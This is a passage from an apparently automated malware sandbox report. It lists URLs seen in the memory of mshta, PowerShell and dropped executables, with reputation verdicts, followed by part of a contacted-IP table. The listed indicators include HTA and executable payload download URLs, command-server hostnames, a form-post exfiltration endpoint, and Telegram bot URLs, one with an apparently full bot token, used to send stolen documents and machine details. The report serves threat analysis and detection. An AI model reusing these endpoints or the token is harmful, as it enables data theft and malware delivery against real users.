                                    https://exi.link/JkAPbLpmshta.exe, 00000004.00000002.416660477.000000000016D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=4039bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.online-banking.business.hsbc.com.hk/portalserver/hsbc/dbbpage/commercial/online/timetablSecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx, 44330000.0.dr, ~DF8426740EAF6412F3.TMP.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/search?q=wmfbKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.hta...mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://checkip.dyndns.org/qsihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/powershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://reallyfreegeoip.orgsihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000274C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.000000000294D000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://exi.link/JkAPbLAAmshta.exe, 00000004.00000002.416660477.000000000016D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://checkip.dyndns.comsihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.438678228.0000000002351000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 0000000C.00000002.457043354.000000000290C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 00000013.00000002.478034779.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://exi.link/S-mshta.exe, 00000004.00000003.416265424.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.00000000001A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htaC:mshta.exe, 00000004.00000003.414459456.0000000000194000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416265424.0000000000184000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://exi.link/JkAPbLEAmshta.exe, 00000004.00000002.416660477.000000000016D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://exi.link/amshta.exe, 00000004.00000003.416265424.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.00000000001A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://reallyfreegeoip.org/xml/sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.hta06mshta.exe, 00000004.00000003.414459456.0000000000194000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416265424.0000000000184000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.ecosia.org/assets/imagebKVNuVuE.exe, 0000001D.00000002.629343652.000000000390B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&ibKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20asihost.exe, 00000011.00000002.625935756.000000000284C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002854000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htalent%mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://checkip.dyndns.orgsihost.exe, 00000011.00000002.625935756.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002776000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002727000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002977000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002928000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchsihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=sihost.exe, 00000011.00000002.625935756.000000000284C000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://exi.link/JkAPbLyXmshta.exe, 00000004.00000002.416660477.000000000013A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://www.google.com/favicon.icobKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/40/sihost.exeppowershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://aborters.duckdns.org:8081sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    unknown
                                    https://ac.ecosia.org/autocomplete?q=sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.business.hsbc.com.hk/en-gb/resource-centre/commercial-tariffs)SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx, 44330000.0.dr, ~DF8426740EAF6412F3.TMP.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/sorry/indexbKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://51.38.247.67:8081/_send_.php?Lsihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htaJ6mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://anotherarmy.dns.army:8081sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    unknown
                                    https://exi.link/mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://reallyfreegeoip.orgsihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002776000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002977000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://192.3.176.138/mshta.exe, 00000004.00000002.417101402.0000000003932000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.0000000003932000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26abKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/search?q=netbKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/sorry/indextestsihost.exe, 00000011.00000002.629360646.0000000003799000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039F3000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://api.telegram.orgsihost.exe, 00000011.00000002.625935756.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002854000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C3A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    132.226.8.169
                                    unknownUnited States
                                    16989UTMEMUSfalse
                                    193.122.6.168
                                    unknownUnited States
                                    31898ORACLE-BMC-31898USfalse
                                    192.3.176.138
                                    unknownUnited States
                                    36352AS-COLOCROSSINGUStrue
                                    193.122.130.0
                                    unknownUnited States
                                    31898ORACLE-BMC-31898USfalse
                                    158.101.44.242
                                    checkip.dyndns.comUnited States
                                    31898ORACLE-BMC-31898USfalse
                                    208.91.198.143
                                    unknownUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUtrue
                                    188.114.97.3
                                    unknownEuropean Union
                                    13335CLOUDFLARENETUSfalse
                                    159.203.133.15
